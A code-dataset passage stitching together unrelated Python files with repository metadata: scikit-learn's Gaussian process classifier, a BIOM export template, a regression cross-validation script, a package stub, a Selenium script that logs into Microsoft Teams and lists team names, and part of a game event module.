n_features) Training data y : array-like of shape (n_samples,) Target values, must be binary Returns ------- self : returns an instance of self. """ if self.kernel is None: # Use an RBF kernel as default self.kernel_ = C(1.0, constant_value_bounds="fixed") \ * RBF(1.0, length_scale_bounds="fixed") else: self.kernel_ = clone(self.kernel) self.rng = check_random_state(self.random_state) self.X_train_ = np.copy(X) if self.copy_X_train else X # Encode class labels and check that it is a binary classification # problem label_encoder = LabelEncoder() self.y_train_ = label_encoder.fit_transform(y) self.classes_ = label_encoder.classes_ if self.classes_.size > 2: raise ValueError("%s supports only binary classification. " "y contains classes %s" % (self.__class__.__name__, self.classes_)) elif self.classes_.size == 1: raise ValueError("{0:s} requires 2 classes; got {1:d} class" .format(self.__class__.__name__, self.classes_.size)) if self.optimizer is not None and self.kernel_.n_dims > 0: # Choose hyperparameters based on maximizing the log-marginal # likelihood (potentially starting from several initial values) def obj_func(theta, eval_gradient=True): if eval_gradient: lml, grad = self.log_marginal_likelihood( theta, eval_gradient=True, clone_kernel=False) return -lml, -grad else: return -self.log_marginal_likelihood(theta, clone_kernel=False) # First optimize starting from theta specified in kernel optima = [self._constrained_optimization(obj_func, self.kernel_.theta, self.kernel_.bounds)] # Additional runs are performed from log-uniform chosen initial # theta if self.n_restarts_optimizer > 0: if not np.isfinite(self.kernel_.bounds).all(): raise ValueError( "Multiple optimizer restarts (n_restarts_optimizer>0) " "requires that all bounds are finite.") bounds = self.kernel_.bounds for iteration in range(self.n_restarts_optimizer): theta_initial = np.exp(self.rng.uniform(bounds[:, 0], bounds[:, 1])) optima.append( self._constrained_optimization(obj_func, theta_initial, bounds)) # Select result from run with minimal (negative) log-marginal # likelihood lml_values = list(map(itemgetter(1), optima)) self.kernel_.theta = optima[np.argmin(lml_values)][0] self.log_marginal_likelihood_value_ = -np.min(lml_values) else: self.log_marginal_likelihood_value_ = \ self.log_marginal_likelihood(self.kernel_.theta) # Precompute quantities required for predictions which are independent # of actual query points K = self.kernel_(self.X_train_) _, (self.pi_, self.W_sr_, self.L_, _, _) = \ self._posterior_mode(K, return_temporaries=True) return self def predict(self, X): """Perform classification on an array of test vectors X. Parameters ---------- X : array-like of shape (n_samples, n_features) Returns ------- C : ndarray of shape (n_samples,) Predicted target values for X, values are from ``classes_`` """ check_is_fitted(self) # As discussed on Section 3.4.2 of GPML, for making hard binary # decisions, it is enough to compute the MAP of the posterior and # pass it through the link function K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star) f_star = K_star.T.dot(self.y_train_ - self.pi_) # Algorithm 3.2,Line 4 return np.where(f_star > 0, self.classes_[1], self.classes_[0]) def predict_proba(self, X): """Return probability estimates for the test vector X. Parameters ---------- X : array-like of shape (n_samples, n_features) Returns ------- C : array-like of shape (n_samples, n_classes) Returns the probability of the samples for each class in the model. The columns correspond to the classes in sorted order, as they appear in the attribute ``classes_``. """ check_is_fitted(self) # Based on Algorithm 3.2 of GPML K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star) f_star = K_star.T.dot(self.y_train_ - self.pi_) # Line 4 v = solve(self.L_, self.W_sr_[:, np.newaxis] * K_star) # Line 5 # Line 6 (compute np.diag(v.T.dot(v)) via einsum) var_f_star = self.kernel_.diag(X) - np.einsum("ij,ij->j", v, v) # Line 7: # Approximate \int log(z) * N(z | f_star, var_f_star) # Approximation is due to Williams & Barber, "Bayesian Classification # with Gaussian Processes", Appendix A: Approximate the logistic # sigmoid by a linear combination of 5 error functions. # For information on how this integral can be computed see # blitiri.blogspot.de/2012/11/gaussian-integral-of-error-function.html alpha = 1 / (2 * var_f_star) gamma = LAMBDAS * f_star integrals = np.sqrt(np.pi / alpha) \ * erf(gamma * np.sqrt(alpha / (alpha + LAMBDAS**2))) \ / (2 * np.sqrt(var_f_star * 2 * np.pi)) pi_star = (COEFS * integrals).sum(axis=0) + .5 * COEFS.sum() return np.vstack((1 - pi_star, pi_star)).T def log_marginal_likelihood(self, theta=None, eval_gradient=False, clone_kernel=True): """Returns log-marginal likelihood of theta for training data. Parameters ---------- theta : array-like of shape (n_kernel_params,) or None Kernel hyperparameters for which the log-marginal likelihood is evaluated. If None, the precomputed log_marginal_likelihood of ``self.kernel_.theta`` is returned. eval_gradient : bool, default: False If True, the gradient of the log-marginal likelihood with respect to the kernel hyperparameters at position theta is returned additionally. If True, theta must not be None. clone_kernel : bool, default=True If True, the kernel attribute is copied. If False, the kernel attribute is modified, but may result in a performance improvement. Returns ------- log_likelihood : float Log-marginal likelihood of theta for training data. log_likelihood_gradient : array, shape = (n_kernel_params,), optional Gradient of the log-marginal likelihood with respect to the kernel hyperparameters at position theta. Only returned when eval_gradient is True. """ if theta is None: if eval_gradient: raise ValueError( "Gradient can only be evaluated for theta!=None") return self.log_marginal_likelihood_value_ if clone_kernel: kernel = self.kernel_.clone_with_theta(theta) else: kernel = self.kernel_ kernel.theta = theta if eval_gradient: K, K_gradient = kernel(self.X_train_, eval_gradient=True) else: K = kernel(self.X_train_) # Compute log-marginal-likelihood Z and also store some temporaries # which can be reused for computing Z's gradient Z, (pi, W_sr, L, b, a) = \ self._posterior_mode(K, return_temporaries=True) if not eval_gradient: return Z # Compute gradient based on Algorithm 5.1 of GPML d_Z = np.empty(theta.shape[0]) # XXX: Get rid of the np.diag() in the next line R = W_sr[:, np.newaxis] * cho_solve((L, True), np.diag(W_sr)) # Line 7 C = solve(L, W_sr[:, np.newaxis] * K) # Line 8 # Line 9: (use einsum to compute np.diag(C.T.dot(C)))) s_2 = -0.5 * (np.diag(K) - np.einsum('ij, ij -> j', C, C)) \ * (pi * (1 - pi) * (1 - 2 * pi)) # third derivative for j in range(d_Z.shape[0]): C = K_gradient[:, :, j] # Line 11 # Line 12: (R.T.ravel().dot(C.ravel()) = np.trace(R.dot(C))) s_1 = .5 * a.T.dot(C).dot(a) - .5 * R.T.ravel().dot(C.ravel()) b = C.dot(self.y_train_ - pi) # Line 13 s_3 = b - K.dot(R.dot(b)) # Line 14 d_Z[j] = s_1 + s_2.T.dot(s_3) # Line 15 return Z, d_Z def _posterior_mode(self, K, return_temporaries=False): """Mode-finding for binary Laplace GPC and fixed kernel. This approximates the posterior of the latent function values for given inputs and target observations with a Gaussian approximation and uses Newton's iteration to find the mode of this approximation. """ # Based on Algorithm 3.1 of GPML # If warm_start are enabled, we reuse the last solution for the # posterior mode as initialization; otherwise, we initialize with 0 if self.warm_start and hasattr(self, "f_cached") \ and self.f_cached.shape == self.y_train_.shape: f = self.f_cached else: f = np.zeros_like(self.y_train_, dtype=np.float64) # Use Newton's iteration method to find mode of Laplace approximation log_marginal_likelihood = -np.inf for _ in range(self.max_iter_predict): # Line 4 pi = expit(f) W = pi * (1 - pi) # Line 5 W_sr = np.sqrt(W) W_sr_K = W_sr[:, np.newaxis] * K B = np.eye(W.shape[0]) + W_sr_K * W_sr L = cholesky(B, lower=True) # Line 6 b = W * f + (self.y_train_ - pi) # Line 7 a = b - W_sr * cho_solve((L, True), W_sr_K.dot(b)) # Line 8 f = K.dot(a) # Line 10: Compute log marginal likelihood in loop and use as # convergence criterion lml = -0.5 * a.T.dot(f) \ - np.log1p(np.exp(-(self.y_train_ * 2 - 1) * f)).sum() \ - np.log(np.diag(L)).sum() # Check if we have converged (log marginal likelihood does # not decrease) # XXX: more complex convergence criterion if lml - log_marginal_likelihood < 1e-10: break log_marginal_likelihood = lml self.f_cached = f # Remember solution for later warm-starts if return_temporaries: return log_marginal_likelihood, (pi, W_sr, L, b, a) else: return log_marginal_likelihood def _constrained_optimization(self, obj_func, initial_theta, bounds): if self.optimizer == "fmin_l_bfgs_b": opt_res = scipy.optimize.minimize( obj_func, initial_theta, method="L-BFGS-B", jac=True, bounds=bounds) _check_optimize_result("lbfgs", opt_res) theta_opt, func_min = opt_res.x, opt_res.fun elif callable(self.optimizer): theta_opt, func_min = \ self.optimizer(obj_func, initial_theta, bounds=bounds) else: raise ValueError("Unknown optimizer %s." % self.optimizer) return theta_opt, func_min class GaussianProcessClassifier(ClassifierMixin, BaseEstimator): """Gaussian process classification (GPC) based on Laplace approximation. The implementation is based on Algorithm 3.1, 3.2, and 5.1 of Gaussian Processes for Machine Learning (GPML) by Rasmussen and Williams. Internally, the Laplace approximation is used for approximating the non-Gaussian posterior by a Gaussian. Currently, the implementation is restricted to using the logistic link function. For multi-class classification, several binary one-versus rest classifiers are fitted. Note that this class thus does not implement a true multi-class Laplace approximation. Parameters ---------- kernel : kernel object The kernel specifying the covariance function of the GP. If None is passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that the kernel's hyperparameters are optimized during fitting. optimizer : string or callable, optional (default: "fmin_l_bfgs_b") Can either be one of the internally supported optimizers for optimizing the kernel's parameters, specified by a string, or an externally defined optimizer passed as a callable. If a callable is passed, it must have the signature:: def optimizer(obj_func, initial_theta, bounds): # * 'obj_func' is the objective function to be maximized, which # takes the hyperparameters theta as parameter and an # optional flag eval_gradient, which determines if the # gradient is returned additionally to the function value # * 'initial_theta': the initial value for theta, which can be # used by local optimizers # * 'bounds': the bounds on the values of theta .... # Returned are the best found hyperparameters theta and # the corresponding value of the target function. return theta_opt, func_min Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize is used. If None is passed, the kernel's parameters are kept fixed. Available internal optimizers are:: 'fmin_l_bfgs_b' n_restarts_optimizer : int, optional (default: 0) The number of restarts of the optimizer for finding the kernel's parameters which maximize the log-marginal likelihood. The first run of the optimizer is performed from the kernel's initial parameters, the remaining ones (if any) from thetas sampled log-uniform randomly from the space of allowed theta-values. If greater than 0, all bounds must be finite. Note that n_restarts_optimizer=0 implies that one run is performed. max_iter_predict : int, optional (default: 100) The maximum number of iterations in Newton's method for approximating the posterior during predict. Smaller values will reduce computation time at the cost of worse results. warm_start : bool, optional (default: False) If warm-starts are enabled, the solution of the last Newton iteration on the Laplace approximation of the posterior mode is used as initialization for the next call of _posterior_mode(). This can speed up convergence when _posterior_mode is called several times on similar problems as in hyperparameter optimization. See :term:`the Glossary <warm_start>`. copy_X_train : bool, optional (default: True) If True, a persistent copy of the training data is stored in the object. Otherwise, just a reference to the training data is stored, which might cause predictions to change if the data is modified externally. random_state : int, RandomState instance or None, optional (default: None) The generator used to initialize the centers. If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. multi_class : string, default : "one_vs_rest" Specifies how multi-class classification problems are handled. Supported are "one_vs_rest" and "one_vs_one". In "one_vs_rest", one binary Gaussian process classifier is fitted for each class, which is trained to separate this class from the rest. In "one_vs_one", one binary Gaussian process classifier is fitted for each pair of classes, which is trained to separate these two classes. The predictions of these binary predictors are combined into multi-class predictions. Note that "one_vs_one" does not support predicting probability estimates. n_jobs : int or None, optional (default=None) The number of jobs to use for the computation. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. Attributes ---------- kernel_ : kernel object The kernel used for prediction. In case of binary classification, the structure of the kernel is the same as the one passed as parameter but with optimized hyperparameters. In case of multi-class classification, a CompoundKernel is returned which consists of the different kernels used in the one-versus-rest classifiers. log_marginal_likelihood_value_ : float The log-marginal-likelihood of ``self.kernel_.theta`` classes_ : array-like of shape (n_classes,) Unique class labels. n_classes_ : int The number of classes in the training data Examples -------- >>> from sklearn.datasets import load_iris >>> from sklearn.gaussian_process import GaussianProcessClassifier >>> from sklearn.gaussian_process.kernels import RBF >>> X, y = load_iris(return_X_y=True) >>> kernel = 1.0 * RBF(1.0) >>> gpc = GaussianProcessClassifier(kernel=kernel, ... random_state=0).fit(X, y) >>> gpc.score(X, y) 0.9866... >>> gpc.predict_proba(X[:2,:]) array([[0.83548752, 0.03228706, 0.13222543], [0.79064206, 0.06525643, 0.14410151]]) .. versionadded:: 0.18 """ def __init__(self, kernel=None, optimizer="fmin_l_bfgs_b", n_restarts_optimizer=0, max_iter_predict=100, warm_start=False, copy_X_train=True, random_state=None, multi_class="one_vs_rest", n_jobs=None): self.kernel = kernel self.optimizer = optimizer self.n_restarts_optimizer = n_restarts_optimizer self.max_iter_predict = max_iter_predict self.warm_start = warm_start self.copy_X_train = copy_X_train self.random_state = random_state self.multi_class = multi_class self.n_jobs = n_jobs def fit(self, X, y): """Fit Gaussian process classification model Parameters ---------- X : array-like of shape (n_samples, n_features) Training data y : array-like of shape (n_samples,) Target values, must be binary Returns ------- self : returns an instance of self. """ X, y = check_X_y(X, y, multi_output=False) self.base_estimator_ = _BinaryGaussianProcessClassifierLaplace( self.kernel, self.optimizer, self.n_restarts_optimizer, self.max_iter_predict, self.warm_start, self.copy_X_train, self.random_state) self.classes_ = np.unique(y) self.n_classes_ = self.classes_.size if self.n_classes_ == 1: raise ValueError("GaussianProcessClassifier requires 2 or more " "distinct classes; got %d class (only class %s " "is present)" % (self.n_classes_, self.classes_[0])) if self.n_classes_ > 2: if self.multi_class == "one_vs_rest": self.base_estimator_ = \ OneVsRestClassifier(self.base_estimator_, n_jobs=self.n_jobs) elif self.multi_class == "one_vs_one": self.base_estimator_ = \ OneVsOneClassifier(self.base_estimator_, n_jobs=self.n_jobs) else: raise ValueError("Unknown multi-class mode %s" % self.multi_class) self.base_estimator_.fit(X, y) if self.n_classes_ > 2: self.log_marginal_likelihood_value_ = np.mean( [estimator.log_marginal_likelihood() for estimator in self.base_estimator_.estimators_]) else: self.log_marginal_likelihood_value_ = \ self.base_estimator_.log_marginal_likelihood() return self def predict(self, X): """Perform classification on an array of test vectors X. Parameters ---------- X : array-like of shape (n_samples, n_features) Returns ------- C : ndarray of shape (n_samples,) Predicted target values for X, values are from ``classes_`` """ check_is_fitted(self) X = check_array(X) return self.base_estimator_.predict(X) def predict_proba(self, X): """Return probability estimates for the test vector X. Parameters ---------- X : array-like of shape (n_samples, n_features) Returns ------- C : array-like of shape (n_samples, n_classes) Returns the probability of the samples for each class in the model. The columns correspond to the classes in sorted order, as they appear in the attribute :term:`classes_`. """ check_is_fitted(self) if self.n_classes_ > 2 and self.multi_class == "one_vs_one": raise ValueError("one_vs_one multi-class mode does not support " "predicting probability estimates. Use " "one_vs_rest mode instead.") X = check_array(X) return self.base_estimator_.predict_proba(X) @property def kernel_(self): if self.n_classes_ == 2: return self.base_estimator_.kernel_ else: return CompoundKernel( [estimator.kernel_ for estimator in self.base_estimator_.estimators_]) def log_marginal_likelihood(self, theta=None, eval_gradient=False, clone_kernel=True): """Returns log-marginal likelihood of theta for training data. In the case of multi-class classification, the mean log-marginal likelihood of the one-versus-rest classifiers are returned. Parameters ---------- theta : array-like of shape (n_kernel_params,) or None Kernel hyperparameters for which the log-marginal likelihood is evaluated. In the case of multi-class classification, theta may be the hyperparameters of the compound kernel or of an individual kernel. In the latter case, all individual kernel get assigned the same theta values. If None, the precomputed log_marginal_likelihood of ``self.kernel_.theta`` is returned. eval_gradient : bool, default: False If True, the gradient of the log-marginal likelihood with respect to the kernel hyperparameters at position theta is returned additionally. Note that gradient computation is not supported for non-binary classification. If True, theta must not be None. clone_kernel : bool, default=True If True, the kernel attribute is copied. If False, the kernel attribute is modified, but may result in a performance improvement. Returns ------- log_likelihood : float Log-marginal likelihood of theta for training data. log_likelihood_gradient : array, shape = (n_kernel_params,), optional Gradient of the log-marginal likelihood with respect to the kernel hyperparameters at position theta. Only returned when eval_gradient is True. """ check_is_fitted(self) if theta is None: if eval_gradient: raise ValueError( "Gradient can only be evaluated for theta!=None") return self.log_marginal_likelihood_value_ theta = np.asarray(theta) if self.n_classes_ == 2: return self.base_estimator_.log_marginal_likelihood( theta, eval_gradient, clone_kernel=clone_kernel) else: if eval_gradient: raise NotImplementedError( "Gradient of log-marginal-likelihood not implemented for " "multi-class GPC.") estimators = self.base_estimator_.estimators_ n_dims = estimators[0].kernel_.n_dims if theta.shape[0] == n_dims: # use same theta for all sub-kernels return np.mean( [estimator.log_marginal_likelihood( theta, clone_kernel=clone_kernel) for i, estimator in enumerate(estimators)]) elif theta.shape[0] == n_dims * self.classes_.shape[0]: # theta for compound kernel return np.mean( [estimator.log_marginal_likelihood( theta[n_dims * i:n_dims * (i + 1)], clone_kernel=clone_kernel) for i, estimator in enumerate(estimators)]) else: raise ValueError("Shape of theta must be either %d or %d. " "Obtained theta with shape %d." % (n_dims, n_dims * self.classes_.shape[0], theta.shape[0]))
42.992248
79
0.617532
9fa5048233526e2d2c16a52a195f0721cc9bbea8
298
py
Python
micone/pipelines/templates/otu_processing/export/biom2tsv.py
segrelab/MiCoNE
91e0c5173293fc6584115036bba599097e4632da
[ "MIT" ]
6
2020-09-23T20:07:13.000Z
2021-04-20T22:10:07.000Z
micone/pipelines/templates/otu_processing/export/biom2tsv.py
segrelab/MiCoNE
91e0c5173293fc6584115036bba599097e4632da
[ "MIT" ]
36
2020-07-24T17:03:27.000Z
2022-03-28T13:13:18.000Z
micone/pipelines/templates/otu_processing/export/biom2tsv.py
segrelab/MiCoNE
91e0c5173293fc6584115036bba599097e4632da
[ "MIT" ]
2
2020-06-07T23:17:39.000Z
2021-03-28T15:04:19.000Z
#!/usr/bin/env python from micone import Otu def main(biom_file, base_name): otu_biom = Otu.load_data(biom_file) otu_biom.write(base_name=base_name, file_type="tsv") if __name__ == "__main__": BIOM_FILE = "${otu_file}" BASE_NAME = "${tax_level}" main(BIOM_FILE, BASE_NAME)
19.866667
56
0.691275
36dd41adef683dcf3b70cb3e1855492cb7786d09
762
py
Python
spot_check_regression_algorithm_linear_regression.py
PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide
1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f
[ "MIT" ]
9
2019-12-23T22:25:11.000Z
2022-02-25T14:54:43.000Z
spot_check_regression_algorithm_linear_regression.py
PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide
1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f
[ "MIT" ]
1
2019-09-22T14:05:42.000Z
2020-12-31T11:55:42.000Z
spot_check_regression_algorithm_linear_regression.py
PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide
1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f
[ "MIT" ]
9
2019-08-01T22:54:08.000Z
2022-01-05T13:57:17.000Z
# -*- coding: utf-8 -*- """ @author: abhilash """ # Cross Validation Regression MAE from pandas import read_csv from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from sklearn.linear_model import LinearRegression filename = 'BostonHousing.csv' names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO','B', 'LSTAT', 'MEDV'] dataframe = read_csv(filename, names=names) array = dataframe.values X = array[:,0:13] Y = array[:,13] kfold = KFold(n_splits=10, random_state=7) model = LinearRegression() scoring = 'neg_mean_squared_error' results = cross_val_score(model, X, Y, cv=kfold, scoring=scoring) print("Mean Squared Error Linear Regression: %f " % (results.mean()))
38.1
113
0.704724
9790eecd9b84a3146c5067028bd5cff041711070
1,413
py
Python
src/pyrin/security/__init__.py
wilsonGmn/pyrin
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
[ "BSD-3-Clause" ]
null
null
null
src/pyrin/security/__init__.py
wilsonGmn/pyrin
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
[ "BSD-3-Clause" ]
null
null
null
src/pyrin/security/__init__.py
wilsonGmn/pyrin
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """ security package. """ import pyrin.application.services as application_services from pyrin.packaging.base import Package class SecurityPackage(Package): """ security package class. """ NAME = __name__ COMPONENT_NAME = 'security.component' CONFIG_STORE_NAMES = ['security'] DEPENDS = ['pyrin.configuration', 'pyrin.cli'] def _load_configs(self, config_services): """ loads all required configs of this package. this method is intended for overriding by subclasses to do custom configurations. :param Module config_services: configuration services dependency. to be able to overcome circular dependency problem, we should inject configuration services dependency into this method. because all other packages are referenced `packaging.base` module in them, so we can't import `pyrin.configuration.services` in this module. this is more beautiful in comparison to importing it inside this method. """ flat_configs = config_services.get_all('security') application_services.configure(flat_configs)
35.325
90
0.577495
7327e9469b555c05baba7059e277643180491c33
2,361
py
Python
meetbot/one.py
satyamx/meetbot
90f1ace6be5135a9789e194484b69eaad3389f18
[ "MIT" ]
24
2021-01-20T20:49:15.000Z
2022-03-27T16:44:51.000Z
meetbot/one.py
satyamx/meetbot
90f1ace6be5135a9789e194484b69eaad3389f18
[ "MIT" ]
3
2022-01-27T03:53:08.000Z
2022-01-27T23:15:34.000Z
meetbot/one.py
satyamx/meetbot
90f1ace6be5135a9789e194484b69eaad3389f18
[ "MIT" ]
1
2022-01-27T09:06:21.000Z
2022-01-27T09:06:21.000Z
from selenium import webdriver import os from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.common.exceptions import NoSuchElementException, TimeoutException from selenium.common.exceptions import StaleElementReferenceException from selenium.common.exceptions import ElementClickInterceptedException from selenium.webdriver.common.action_chains import ActionChains import time def chrome_options(): global options options = webdriver.ChromeOptions() options.add_argument("--no-sandbox") options.add_argument("--headless") options.add_argument("--disable-dev-shm-usage") options.add_argument("--use-fake-ui-for-media-stream") def bunk(email, password): global teams chrome_options() PATH = '/usr/bin/chromedriver' driver = webdriver.Chrome(executable_path=PATH, options=options) driver.get("https://teams.microsoft.com/_#/school//?ctx=teamsGrid") ignored_exceptions = (NoSuchElementException, StaleElementReferenceException, ElementClickInterceptedException) email_element = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until( EC.presence_of_element_located((By.ID, "i0116")) ) email_element.send_keys(email) email_element.send_keys(Keys.RETURN) time.sleep(3) password_element = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until( EC.presence_of_element_located((By.ID, "i0118")) ) password_element.send_keys(password) time.sleep(3) element = WebDriverWait(driver, 100, ignored_exceptions=ignored_exceptions).until( EC.presence_of_element_located((By.ID, "idSIButton9")) ) element.click() time.sleep(3) actions = ActionChains(driver) actions.send_keys(Keys.RETURN) actions.perform() time.sleep(7) try: t4sne = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until( EC.presence_of_all_elements_located((By.CLASS_NAME, "team-name-text")) ) teams = [] for i in t4sne: teams.append(i.text) driver.quit() return teams except TimeoutException: message = 'Invalid credentials' return message
35.772727
115
0.740364
5711e836cfe7b222b19312234efd389e9332d208
42,800
py
Python
pytgf/logic/event.py
Youlixx/pytgf
ea0b5e45afb6da3368ef8e9f340dab26202caddb
[ "MIT" ]
2
2020-07-07T00:23:29.000Z
2021-03-16T18:42:04.000Z
pytgf/logic/event.py
Youlixx/pytgf
ea0b5e45afb6da3368ef8e9f340dab26202caddb
[ "MIT" ]
null
null
null
pytgf/logic/event.py
Youlixx/pytgf
ea0b5e45afb6da3368ef8e9f340dab26202caddb
[ "MIT" ]
null
null
null
""" Contains every class related to events and some basic key handlers """ import numpy import json class Event: """ The top level event type. Any event that occurs in the game can be represented using an Event. It can represents the entity interactions with the level, or the user external inputs. Custom events can be defined by extending this class. The events are handled by the main event queue. Attributes ---------- tick: int The tick at which the event got fired. """ def __init__(self, tick: int): """ Initializes the Event. Parameters ---------- tick: int The tick at which the event got fired. """ self.tick = tick def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "Event[tick=" + str(self.tick) + "]" class CancelableEvent(Event): """ A type of event that can be canceled. Some events may be canceled during their processing by the event queue. When an CancelableEvent is canceled, it will not be processed further by the next handlers of the event queue. Attributes ---------- tick: int The tick at which the event got fired. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __init__(self, tick: int): """ Initializes the CancelableEvent. Parameters ---------- tick: int The tick at which the event got fired. """ Event.__init__(self, tick) self._canceled = False def cancel(self) -> None: """ Cancels the event. By canceling the event, it will not be processed by the other handlers of the EventQueue. """ self._canceled = True def is_canceled(self) -> bool: """ Returns whether or not the event got canceled. Returns ------- canceled: bool The state of the event, True if it got canceled and False otherwise. """ return self._canceled def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "CancelableEvent[tick=" + str(self.tick) + ", canceled=" + str(self._canceled) + "]" class EventQueue: """ The event processing core. When an event is created, it should be processed by the event queue. The event queue contains the list of different user-defined handlers in which the new Event will be passed as argument. Attributes --------- history: list of Event The list of fired events. Methods ------- register_event_handler(event_type, handler) Registers a new event handler. fire_event(event) Handles a new fired Event. """ DEFAULT_HISTORY_LENGTH = 512 def __init__(self, history_length: int = DEFAULT_HISTORY_LENGTH): """ Initializes the EventQueue. Parameters ---------- history_length: int, optional The length of the event history. """ self._history_length = history_length self._handlers = [] self.history = [] def __len__(self) -> int: """ Returns the length of the event history. Returns ------- length: int The length of the event history. """ return len(self.history) def register_event_handler(self, event_type: type, handler: callable) -> None: """ Registers a new event handler. Registers a new handler for the specified event type. Every event that extends from the specified type will be passed as argument to the handler when fired. The handler functions should only take one argument, the event fired. Parameters ---------- event_type: type The type of event which will be passed to the handler when fired. handler: callable The handler function. This function should only take the event passed as argument. """ self._handlers.append((event_type, handler)) def fire_event(self, event: Event) -> None: """ Handles a new fired event. Passes the Event through the different registered handlers for the event type. The orders of registration of the handler is taken into account, using a CancelableEvent allow to break out of the handler loop. Parameters ---------- event: Event The fired event. """ if len(self.history) == self._history_length: del self.history[0] self.history.append(event) for event_type, handler in self._handlers: if isinstance(event, event_type): if isinstance(event, CancelableEvent): if not event.is_canceled(): handler(event) else: handler(event) def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "EventQueue[]" class Key: """ An enumeration containing the different key codes. The user keyboard inputs are represented using key codes. The Key class stores the key codes of every possible input that can be issued by the Window. Methods ------- get_corresponding_char(key_code) Converts the key code into the associated character. """ KEY_BACKSPACE = 65288 KEY_TAB = 65289 KEY_LINEFEED = 65290 KEY_CLEAR = 65291 KEY_RETURN = 65293 KEY_ENTER = 65293 KEY_PAUSE = 65299 KEY_SCROLL_LOCK = 65300 KEY_SYS_REQ = 65301 KEY_ESCAPE = 65307 KEY_HOME = 65360 KEY_LEFT = 65361 KEY_UP = 65362 KEY_RIGHT = 65363 KEY_DOWN = 65364 KEY_PAGE_UP = 65365 KEY_PAGE_DOWN = 65366 KEY_END = 65367 KEY_BEGIN = 65368 KEY_DELETE = 65535 KEY_SELECT = 65376 KEY_PRINT = 65377 KEY_EXECUTE = 65378 KEY_INSERT = 65379 KEY_UNDO = 65381 KEY_REDO = 65382 KEY_MENU = 65383 KEY_FIND = 65384 KEY_CANCEL = 65385 KEY_HELP = 65386 KEY_BREAK = 65387 KEY_MODE_SWITCH = 65406 KEY_SCRIPT_SWITCH = 65406 KEY_MOTION_UP = 65362 KEY_MOTION_RIGHT = 65363 KEY_MOTION_DOWN = 65364 KEY_MOTION_LEFT = 65361 KEY_MOTION_NEXT_WORD = 1 KEY_MOTION_PREVIOUS_WORD = 2 KEY_MOTION_BEGINNING_OF_LINE = 3 KEY_MOTION_END_OF_LINE = 4 KEY_MOTION_NEXT_PAGE = 65366 KEY_MOTION_PREVIOUS_PAGE = 65365 KEY_MOTION_BEGINNING_OF_FILE = 5 KEY_MOTION_END_OF_FILE = 6 KEY_MOTION_BACKSPACE = 65288 KEY_MOTION_DELETE = 65535 KEY_NUM_LOCK = 65407 KEY_NUM_SPACE = 65408 KEY_NUM_TAB = 65417 KEY_NUM_ENTER = 65421 KEY_NUM_F1 = 65425 KEY_NUM_F2 = 65426 KEY_NUM_F3 = 65427 KEY_NUM_F4 = 65428 KEY_NUM_HOME = 65429 KEY_NUM_LEFT = 65430 KEY_NUM_UP = 65431 KEY_NUM_RIGHT = 65432 KEY_NUM_DOWN = 65433 KEY_NUM_PRIOR = 65434 KEY_NUM_PAGE_UP = 65434 KEY_NUM_NEXT = 65435 KEY_NUM_PAGE_DOWN = 65435 KEY_NUM_END = 65436 KEY_NUM_BEGIN = 65437 KEY_NUM_INSERT = 65438 KEY_NUM_DELETE = 65439 KEY_NUM_EQUAL = 65469 KEY_NUM_MULTIPLY = 65450 KEY_NUM_ADD = 65451 KEY_NUM_SEPARATOR = 65452 KEY_NUM_SUBTRACT = 65453 KEY_NUM_DECIMAL = 65454 KEY_NUM_DIVIDE = 65455 KEY_NUM_0 = 65456 KEY_NUM_1 = 65457 KEY_NUM_2 = 65458 KEY_NUM_3 = 65459 KEY_NUM_4 = 65460 KEY_NUM_5 = 65461 KEY_NUM_6 = 65462 KEY_NUM_7 = 65463 KEY_NUM_8 = 65464 KEY_NUM_9 = 65465 KEY_F1 = 65470 KEY_F2 = 65471 KEY_F3 = 65472 KEY_F4 = 65473 KEY_F5 = 65474 KEY_F6 = 65475 KEY_F7 = 65476 KEY_F8 = 65477 KEY_F9 = 65478 KEY_F10 = 65479 KEY_F11 = 65480 KEY_F12 = 65481 KEY_F13 = 65482 KEY_F14 = 65483 KEY_F15 = 65484 KEY_F16 = 65485 KEY_LEFT_SHIFT = 65505 KEY_RIGHT_SHIFT = 65506 KEY_LEFT_CTRL = 65507 KEY_RIGHT_CTRL = 65508 KEY_CAPS_LOCK = 65509 KEY_LEFT_META = 65511 KEY_RIGHT_META = 65512 KEY_LEFT_ALT = 65513 KEY_RIGHT_ALT = 65514 KEY_LEFT_WINDOWS = 65515 KEY_RIGHT_WINDOWS = 65516 KEY_LEFT_COMMAND = 65517 KEY_RIGHT_COMMAND = 65518 KEY_LEFT_OPTION = 65488 KEY_RIGHT_OPTION = 65489 KEY_SPACE = 32 KEY_EXCLAMATION = 33 KEY_DOUBLE_QUOTE = 34 KEY_HASH = 35 KEY_POUND = 35 KEY_DOLLAR = 36 